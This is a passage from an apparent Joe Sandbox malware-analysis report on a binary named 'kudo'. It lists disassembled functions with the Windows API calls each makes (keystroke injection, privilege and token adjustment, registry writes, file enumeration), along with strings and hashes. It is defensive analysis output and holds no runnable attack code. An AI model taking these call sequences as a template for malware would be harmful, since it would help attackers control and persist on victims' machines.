                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID:
                                                      • API String ID: 1452528299-0
                                                      • Opcode ID: effc9abf6ac745cece9aaca46c3bcc2232c46ecfab3ef9c8c3d04e1c434b1caf
                                                      • Instruction ID: d5a8660a3f9915fa445c840b0c8015c603220d52cf19e4d173f9ed736d8b09d0
                                                      • Opcode Fuzzy Hash: effc9abf6ac745cece9aaca46c3bcc2232c46ecfab3ef9c8c3d04e1c434b1caf
                                                      • Instruction Fuzzy Hash: 9E716E706043058FCB44EF68D8A1A6AB7E0FF99314F05492DF996DB3A2DB30E945CB52
                                                      Function 00A3F3B8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457539916.0000000000A3D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_a3d000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction ID: c139237ee4940abb94aa124dc7e090416d147ddbbfe95e266157eebcab569fa3
                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction Fuzzy Hash: 87E0E67594010DDFDB00DFB4D54969D7BB4EF04302F100161FD01D2280D6309D508A62

                                                      Non-executed Functions

                                                      Function 0088CABC Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 632windowkeyboardnativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 0088CB37
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0088CB95
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0088CBD6
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0088CC00
                                                      • SendMessageW.USER32 ref: 0088CC29
                                                      • _wcsncpy.LIBCMT ref: 0088CC95
                                                      • GetKeyState.USER32(00000011), ref: 0088CCB6
                                                      • GetKeyState.USER32(00000009), ref: 0088CCC3
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0088CCD9
                                                      • GetKeyState.USER32(00000010), ref: 0088CCE3
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0088CD0C
                                                      • SendMessageW.USER32 ref: 0088CD33
                                                      • SendMessageW.USER32(?,00001030,?,0088B348), ref: 0088CE37
                                                      • SetCapture.USER32(?), ref: 0088CE69
                                                      • ClientToScreen.USER32(?,?), ref: 0088CECE
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0088CEF5
                                                      • ReleaseCapture.USER32 ref: 0088CF00
                                                      • GetCursorPos.USER32(?), ref: 0088CF3A
                                                      • ScreenToClient.USER32(?,?), ref: 0088CF47
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0088CFA3
                                                      • SendMessageW.USER32 ref: 0088CFD1
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0088D00E
                                                      • SendMessageW.USER32 ref: 0088D03D
                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0088D05E
                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0088D06D
                                                      • GetCursorPos.USER32(?), ref: 0088D08D
                                                      • ScreenToClient.USER32(?,?), ref: 0088D09A
                                                      • GetParent.USER32(?), ref: 0088D0BA
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0088D123
                                                      • SendMessageW.USER32 ref: 0088D154
                                                      • ClientToScreen.USER32(?,?), ref: 0088D1B2
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0088D1E2
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0088D20C
                                                      • SendMessageW.USER32 ref: 0088D22F
                                                      • ClientToScreen.USER32(?,?), ref: 0088D281
                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0088D2B5
                                                        • Part of subcall function 008025DB: GetWindowLongW.USER32(?,000000EB), ref: 008025EC
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0088D351
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                      • String ID: @GUI_DRAGID$F
                                                      • API String ID: 302779176-4164748364
                                                      • Opcode ID: f73b09d8d095fd7fccb72630f9feb85b25e1a4c58464f3c22375df2be6b7f4bb
                                                      • Instruction ID: cdd927c7625440d00c18a39456455c0ab8f789782fcb7136b394ea279d81aa7e
                                                      • Opcode Fuzzy Hash: f73b09d8d095fd7fccb72630f9feb85b25e1a4c58464f3c22375df2be6b7f4bb
                                                      • Instruction Fuzzy Hash: FE42AD74204741AFDB20EF28C848EAABBE5FF49320F140629F659C72B5D771E844DB62
                                                      Function 00816F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _memmove$_memset
                                                      • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                      • API String ID: 1357608183-1798697756
                                                      • Opcode ID: 4074268cbe372d80987b8a0f9c932abe27a692540b4600758db7440d39d3c0ae
                                                      • Instruction ID: 5f3da692b721eae4a7de49f743420b085d549a93788b14b0b090983642608bd0
                                                      • Opcode Fuzzy Hash: 4074268cbe372d80987b8a0f9c932abe27a692540b4600758db7440d39d3c0ae
                                                      • Instruction Fuzzy Hash: A1939D75A04219DBDB24CFA8C881BEDB7B1FF48355F24816AED45EB281E7709E85CB40
                                                      Function 008048D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 008048DF
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0083D665
                                                      • IsIconic.USER32(?), ref: 0083D66E
                                                      • ShowWindow.USER32(?,00000009), ref: 0083D67B
                                                      • SetForegroundWindow.USER32(?), ref: 0083D685
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0083D69B
                                                      • GetCurrentThreadId.KERNEL32 ref: 0083D6A2
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0083D6AE
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0083D6BF
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0083D6C7
                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 0083D6CF
                                                      • SetForegroundWindow.USER32(?), ref: 0083D6D2
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0083D6E7
                                                      • keybd_event.USER32(00000012,00000000), ref: 0083D6F2
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0083D6FC
                                                      • keybd_event.USER32(00000012,00000000), ref: 0083D701
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0083D70A
                                                      • keybd_event.USER32(00000012,00000000), ref: 0083D70F
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0083D719
                                                      • keybd_event.USER32(00000012,00000000), ref: 0083D71E
                                                      • SetForegroundWindow.USER32(?), ref: 0083D721
                                                      • AttachThreadInput.USER32(?,?,00000000), ref: 0083D748
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 4125248594-2988720461
                                                      • Opcode ID: fa9108320540ed23bf8595b96e262749423e028cb6618596724c69a196e64160
                                                      • Instruction ID: 7be90da7e8f7e26a3a1178c434a7668be05895544a4b57453fcfc1bfbe6f301a
                                                      • Opcode Fuzzy Hash: fa9108320540ed23bf8595b96e262749423e028cb6618596724c69a196e64160
                                                      • Instruction Fuzzy Hash: 26317271A40318BBEB206B659C4AF7F7E6CFB84B50F104025FB05EA1D2D6B05911ABE0
                                                      Function 00858310 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 224COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 008587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0085882B
                                                        • Part of subcall function 008587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00858858
                                                        • Part of subcall function 008587E1: GetLastError.KERNEL32 ref: 00858865
                                                      • _memset.LIBCMT ref: 00858353
                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008583A5
                                                      • CloseHandle.KERNEL32(?), ref: 008583B6
                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008583CD
                                                      • GetProcessWindowStation.USER32 ref: 008583E6
                                                      • SetProcessWindowStation.USER32(00000000), ref: 008583F0
                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0085840A
                                                        • Part of subcall function 008581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00858309), ref: 008581E0
                                                        • Part of subcall function 008581CB: CloseHandle.KERNEL32(?), ref: 008581F2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                      • String ID: $default$winsta0
                                                      • API String ID: 2063423040-1027155976
                                                      • Opcode ID: adfd69c637389f53fa90f1bb929958d37f7feabfbe622ae2402f5994187a3e6f
                                                      • Instruction ID: a3b665ff41ead2631233775976704562ae3395d0bb181cd2fa82fd73439b51bd
                                                      • Opcode Fuzzy Hash: adfd69c637389f53fa90f1bb929958d37f7feabfbe622ae2402f5994187a3e6f
                                                      • Instruction Fuzzy Hash: 85812575900209EEDF119FA8DC45AEEBBB9FF08305F14416AFD14F6261EB318A189B21
                                                      Function 0086C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0086C78D
                                                      • FindClose.KERNEL32(00000000), ref: 0086C7E1
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0086C806
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0086C81D
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0086C844
                                                      • __swprintf.LIBCMT ref: 0086C890
                                                      • __swprintf.LIBCMT ref: 0086C8D3
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                      • __swprintf.LIBCMT ref: 0086C927
                                                        • Part of subcall function 00823698: __woutput_l.LIBCMT ref: 008236F1
                                                      • __swprintf.LIBCMT ref: 0086C975
                                                        • Part of subcall function 00823698: __flsbuf.LIBCMT ref: 00823713
                                                        • Part of subcall function 00823698: __flsbuf.LIBCMT ref: 0082372B
                                                      • __swprintf.LIBCMT ref: 0086C9C4
                                                      • __swprintf.LIBCMT ref: 0086CA13
                                                      • __swprintf.LIBCMT ref: 0086CA62
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                      • API String ID: 3953360268-2428617273
                                                      • Opcode ID: e18a8791fd459f027bcdd92c72a01235922b0ef3c9df2c22f150b3d176123533
                                                      • Instruction ID: 00a2ac69239b42dc872c72d9a85298d1d4850a0ea27d9c7bbd162a5c58667a24
                                                      • Opcode Fuzzy Hash: e18a8791fd459f027bcdd92c72a01235922b0ef3c9df2c22f150b3d176123533
                                                      • Instruction Fuzzy Hash: 88A11DB1404204ABC750EFA8DC85DAFB7ECFF95704F404929F595C6292EA34DA48CB63
                                                      Function 0086EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 0086EFB6
                                                      • _wcscmp.LIBCMT ref: 0086EFCB
                                                      • _wcscmp.LIBCMT ref: 0086EFE2
                                                      • GetFileAttributesW.KERNEL32(?), ref: 0086EFF4
                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 0086F00E
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0086F026
                                                      • FindClose.KERNEL32(00000000), ref: 0086F031
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0086F04D
                                                      • _wcscmp.LIBCMT ref: 0086F074
                                                      • _wcscmp.LIBCMT ref: 0086F08B
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0086F09D
                                                      • SetCurrentDirectoryW.KERNEL32(008B8920), ref: 0086F0BB
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0086F0C5
                                                      • FindClose.KERNEL32(00000000), ref: 0086F0D2
                                                      • FindClose.KERNEL32(00000000), ref: 0086F0E4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                      • String ID: *.*
                                                      • API String ID: 1803514871-438819550
                                                      • Opcode ID: 074087e07c16ea540d85fae8a3a6a0456fc404700b232afe0deda3d064ab50d0
                                                      • Instruction ID: 3aceb367db35c16d629cb426b26cf7c8594733e78c90c8385ee8abb6807656c2
                                                      • Opcode Fuzzy Hash: 074087e07c16ea540d85fae8a3a6a0456fc404700b232afe0deda3d064ab50d0
                                                      • Instruction Fuzzy Hash: 3131B4325016196BDB14EFA8EC49AEE77ACFF48360F110175EA14D2192DB74DA84CF62
                                                      Function 00880857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00880953
                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0088F910,00000000,?,00000000,?,?), ref: 008809C1
                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00880A09
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00880A92
                                                      • RegCloseKey.ADVAPI32(?), ref: 00880DB2
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00880DBF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectCreateRegistryValue
                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                      • API String ID: 536824911-966354055
                                                      • Opcode ID: 1e9002d600dd867376fbb5498012260269de126e505b3cb04cc7fdb08ba4d071
                                                      • Instruction ID: 15543e56107c4846c8abd3001786493afa5a1741ffc115ea4b1fbafeaff7c662
                                                      • Opcode Fuzzy Hash: 1e9002d600dd867376fbb5498012260269de126e505b3cb04cc7fdb08ba4d071
                                                      • Instruction Fuzzy Hash: 620238756046119FCB54EF28D841E2AB7E5FF89314F048568F99ADB3A2DB30EC45CB82
                                                      Function 0088C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfilenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • DragQueryPoint.SHELL32(?,?), ref: 0088C627
                                                        • Part of subcall function 0088AB37: ClientToScreen.USER32(?,?), ref: 0088AB60
                                                        • Part of subcall function 0088AB37: GetWindowRect.USER32(?,?), ref: 0088ABD6
                                                        • Part of subcall function 0088AB37: PtInRect.USER32(?,?,0088C014), ref: 0088ABE6
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0088C690
                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0088C69B
                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0088C6BE
                                                      • _wcscat.LIBCMT ref: 0088C6EE
                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0088C705
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0088C71E
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0088C735
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0088C757
                                                      • DragFinish.SHELL32(?), ref: 0088C75E
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0088C851
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                      • API String ID: 2166380349-3440237614
                                                      • Opcode ID: bf8e4c4daf46cb7ae38b8445b7d5de8455bf279ac29052ee56d721f65f654f54
                                                      • Instruction ID: 98ee8ffa1e80363d811b4eaf5a4114556deac2829383b18b23ce05847c3b4191
                                                      • Opcode Fuzzy Hash: bf8e4c4daf46cb7ae38b8445b7d5de8455bf279ac29052ee56d721f65f654f54
                                                      • Instruction Fuzzy Hash: 0B614D71108305AFC701EF68DC85D9BBBE8FF99710F10092EF695D22A1DB70A949CB62
                                                      Function 0086F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 0086F113
                                                      • _wcscmp.LIBCMT ref: 0086F128
                                                      • _wcscmp.LIBCMT ref: 0086F13F
                                                        • Part of subcall function 00864385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008643A0
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0086F16E
                                                      • FindClose.KERNEL32(00000000), ref: 0086F179
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0086F195
                                                      • _wcscmp.LIBCMT ref: 0086F1BC
                                                      • _wcscmp.LIBCMT ref: 0086F1D3
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0086F1E5
                                                      • SetCurrentDirectoryW.KERNEL32(008B8920), ref: 0086F203
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0086F20D
                                                      • FindClose.KERNEL32(00000000), ref: 0086F21A
                                                      • FindClose.KERNEL32(00000000), ref: 0086F22C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
